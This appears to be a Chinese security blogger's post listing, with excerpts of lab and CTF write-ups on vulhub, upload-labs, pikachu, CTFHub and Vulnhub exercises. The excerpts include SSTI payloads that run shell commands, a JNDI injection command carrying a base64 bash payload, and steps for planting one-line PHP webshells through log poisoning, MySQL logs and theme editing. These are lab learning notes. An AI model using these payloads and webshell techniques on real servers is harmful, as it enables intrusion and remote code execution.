- 博客(49)
- 收藏
- 关注
原创 nps内网穿透之——腾讯云服务器和linux虚拟机
1、客户端:准备一个内网的linux内网主机,或是一个虚拟机。2、服务端:准备一个云服务器(阿里、腾讯、华为都行)。
2024-08-12 20:20:51
1259
1
原创 【vulhub靶场之spring】——
Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。
2024-08-07 19:34:32
509
原创 【vulhub靶场之struts2】——s2-057
漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
2024-08-07 18:47:37
592
原创 【vulhub靶场之rsync关】
查看一下文件里面的内容,里面的大概意思就是每17分钟调用一次/etc/cron.hourly。nmap -p 873 --script rsync-list-modules 加IP地址。随便往里面写一个文件测试一下,例如phpinfo.php,如下命令在kali创建一个文件。等待17分钟后,查看监听到的信息,代表连接成功。将文件再上传到受害者,也就是靶场环境里。在kali机子上拉取一个shell文件。查看src目录里面的信息。查看到是有漏洞的模块的。将文件下载下到kali。将shell文件提权。
2024-08-05 22:28:06
1495
原创 【Jenkins未授权访问漏洞 】
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
2024-08-04 17:55:15
582
原创 【Memcached未授权访问漏洞】
sc create "Memcached11211" binPath= "D:\网络安全培训\上课实验包\memcached-1.4.5-amd64\memcached-amd64\memcached.exe -d runservice -p 11211" DisplayName= "Memcached11211" start= auto。下载完成,用管理员身份打开cmd窗口。执行命令安装,注意地址替换为自己的。开启服务,注意地址替换为自己的。
2024-08-04 17:31:40
379
原创 Redis漏洞复现【vulhub靶场】
看所有键:KEYS *,使用select num可以查看键值数据。redis-cli -h 192.168.4.176-p 6379#redis常见命令。(7)config get dir/dbfilename 获取路径及数据配置信息。进入目录:cd /vulhub-master/redis/4-unacc。启动:docker-compose up -d。(2)删除所有数据库内容:flushall。检查:docker-compose ps。(9)get 变量,查看变量名称。(1)查看信息:info。
2024-08-04 11:55:06
545
原创 ASPCMS漏洞之文件上传漏洞
ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。
2024-08-04 11:12:03
498
原创 phpMyAdmin之CMS靶场
路径:C:\phpStudy\MySQL\data\。猜测web路径:C:\phpStudy\www。使用中国菜刀工具连接自己创建的php文件。设置日志文件目录,创建php日志文件。不要⽤\,如⾥要⽤\\(转义)懒人方法:也可以直接全部运行。1.⾸先判断mysql位置。往日志文件里写一句话木马。查看自己创建的日志文件。3.写webshell。链接到了服务器的目录。
2024-08-03 14:38:27
551
原创 DedeCMS-V5.7.82-UTF8织梦管理系统漏洞
将靶场环境放到www目录下——访问/dedecms/uploads同意协议——继续继续配置后——点击继续进入后台登录后台——填写用户名密码。
2024-08-03 11:38:05
649
原创 vulhub靶场之wordpress关卡
执行命令 cd /vulhub/wordpress/pwnscriptumdocker-compose up -d。连接成功,进入了靶场的目录(我是kali搭建的靶场)打开wordpress关卡,选择简体中文——继续。添加信息——点击安装WordPress。插入一句话木马 ——更新文件。点击外观——编辑主题。
2024-08-03 10:00:04
468
原创 thinkphp之命令执行漏洞复现
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令1}|{base64,-d}|bash"-A 你的ypsipl。访问一下:/solr/admin/cores?第一步:先在dns平台上,点击Get SubDomain ,监控我们的注入效果。kali里面就可以监听的到了。
2024-08-02 11:59:15
498
原创 【pikachu靶场】之ITOver Permission越权漏洞
ITOver Permission越权漏洞,,,里面有用户名和密码,,后面要用。。
2024-08-02 10:41:59
191
原创 kali里面的vulhub靶场搭建
查看一下docker-compose的版本信息,查看一下docker-compose有没有下载成功。例如我的是192.168.189.150:8080访问成功,请开始您的操作。进入vulhub后,使用ls命令列出vulhub下的文件也就是靶场关卡。继续ls列出该靶场关卡下的关卡漏洞编号。也可以直接在vulhub文件夹中右键打开终端。先查看一下docker有没有下载成功。再查看一下docker的运行状态。如下图是我开启后的端口。
2024-08-01 14:22:48
847
原创 【bugku靶场 1 至 5 关】持续更新ing。。。
flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}_builtins__['eval']("__import__('os').popen('cat flag').read()")}}访问admin.php使用管理员账号密码登录,然后查看xss平台的cookie,看到了flag字样,但好像被编码了。这句话的意思是:“给我这个文件,我将通过 Python 为您返回运行结果!
2024-07-30 20:46:52
440
原创 【Vulnhub靶机tomato渗透】
这是一个日志文件,记录了所有和用户认证相关的 日志。思路是往日志文件写入一句话木马,然后连接,写入方法就是使用一句话木马来作为用户进行SSH连接,这样。接下来就可以在日志里面写入一句话木马了,如下图,使用ssh连接失败日志写入一句木马。就会记录我们的登录,一句话木马也就被写入进去了,先查看是否能读取这个文件。是一个常见的系统日志文件,通常用于记录与系统认证和授权相关的信息。是包含,如下图经过测试发现拥有文件包含漏洞,这里的测试是读取。认证失败的尝试,例如错误的密码、无效的用户账号等。
2024-07-29 20:26:27
658
原创 文件上传漏洞--之upload-labs靶场第 11-15关(后三关需要制作图片马)持续更新ing...
文件上传漏洞--之upload-labs靶场详解11-15关
2024-07-28 23:49:15
1073
原创 文件上传漏洞--之upload-labs靶场(第6-10关)专栏更新ing......
为避免执行之前关卡的上传了的php文件代码,可以将upload文件夹下的文件清空。
2024-07-27 16:31:44
384
原创 pikachu靶场之模拟xxe漏洞
payload中 &xxe; 是用来将xxe这个实体进行调用,xxe实体成功在前端回显。 查到了我在我新建的xxe.txt文件下输入的内容“我是一个网安小白白”--查看源码:利用php://协议的filter过滤器以base64格式读取服务器/本地文件,代码如下查到的是编码后3的内容,解码之后就可--DTD外部调用:第一步:模拟文件准备1、在D盘根目录新建一个flag.txt在flag.txt文件中随便输入内容,我输入的是“你好,张万森6666666666”文件在路径为
2024-07-25 16:55:25
487
原创 【CTFHub】ssrf漏洞--之上传文件
第一步:打开环境第二步:访问flag.php第三步:没有提交按钮,所以打开检查器,编辑html代码第四步:修改代码如下图第五步:点击提交按钮,抓包提交数据包第六步:将host后面改为127.0.0.1:80,将数据包发送到repeater第七步:将乱码的中文删掉重新输入两个中文字第八步:将数据包保存为txt文件第九步:将保存的数据包代码进行第一次编码第十步:将第一次编码后的数据包ctrl+f替换,将%0A替换为%0A%0D再进行
2024-07-24 21:30:59
394
1
原创 【CTFHub】FastCGI协议
第三步:Gopherus-master工具文件中打开终端,输入以下代码。第六步:打开中国菜刀工具访问/shell.php。第一步:开启环境后,打开kali虚拟机,第七步:在查到的文件里面找到flag提交。第四步将kali里面生成的代码复制进。第二步:生成一句话木马。第五步:复制到地址栏中。第八步: 找到flag。
2024-07-24 19:53:07
567
3
原创 【CTFHub】WEB之SSRF(前四关)--内网访问、伪协议读取文件、端口扫描、post请求
配置好后开始攻击,根据长度不同查看到端口为8965端口已经查出但是请求错误,怀疑是dirt://不可用然后改成http://后,成功拿到。
2024-07-24 15:42:27
546
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人